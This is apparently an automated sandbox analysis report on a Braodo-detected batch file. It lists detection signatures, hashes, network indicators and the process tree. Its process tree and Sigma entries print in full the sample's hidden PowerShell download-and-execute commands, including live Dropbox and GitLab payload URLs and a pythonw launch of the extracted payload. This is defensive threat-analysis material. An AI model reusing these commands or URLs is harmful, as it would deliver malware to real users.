Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
13jhsfbose.bat

Overview

General Information

Sample name:13jhsfbose.bat
Analysis ID:1557419
MD5:dfdf2f2e7d7b6f1275a657b61a07374f
SHA1:e280342e751b3029b944072bdd1b4cee057fa6a4
SHA256:05591be36639ad9296f45115fe68976e53ea744ba87ab927c9d129e0822988d1
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 572 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 1292 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 3116 cmdline: fIndstr /L /I set "C:\Users\user\Desktop\13jhsfbose.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3784 cmdline: fIndstr /L /I goto "C:\Users\user\Desktop\13jhsfbose.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6152 cmdline: fIndstr /L /I echo "C:\Users\user\Desktop\13jhsfbose.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6368 cmdline: fIndstr /L /I pause "C:\Users\user\Desktop\13jhsfbose.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 1268 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 1408 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 1084 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2352 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3856 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4336 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6448 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1292 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
13jhsfbose.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 2352JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 4336JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_2352.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_4336.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_1292.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell DownloadFile
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4336, TargetFilename: C:\Users\Public\Document.zip
              Sigma detected: PowerShell Download Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\13jhsfbose.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 2352, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T08:47:24.268623+010028033053Unknown Traffic192.168.2.549755172.65.251.78443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://instructorledlearning.dropboxbusiness.com/Avira URL Cloud: Label: phishing
              Multi AV Scanner detection for submitted file
              Source: 13jhsfbose.batVirustotal: Detection: 7%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.6% probability
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: Binary string: e.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE272000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdbIKEhj source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb+ source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE21C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32poration1)0' source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE034000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbtem32T source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbSc" source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\System.Core.pdb source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE054000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE054000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.pdb source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6?m.pdbpdbtem.pdbtX source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2473727057.0000022E35518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdbpdblib.pdbQ source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE293000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Htem.pdbwas ma source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2476951374.0000022E357DE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbe source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp
              Source: global trafficHTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /users/sign_in HTTP/1.1Host: gitlab.com
              Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
              Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 172.65.251.78:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /users/sign_in HTTP/1.1Host: gitlab.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: 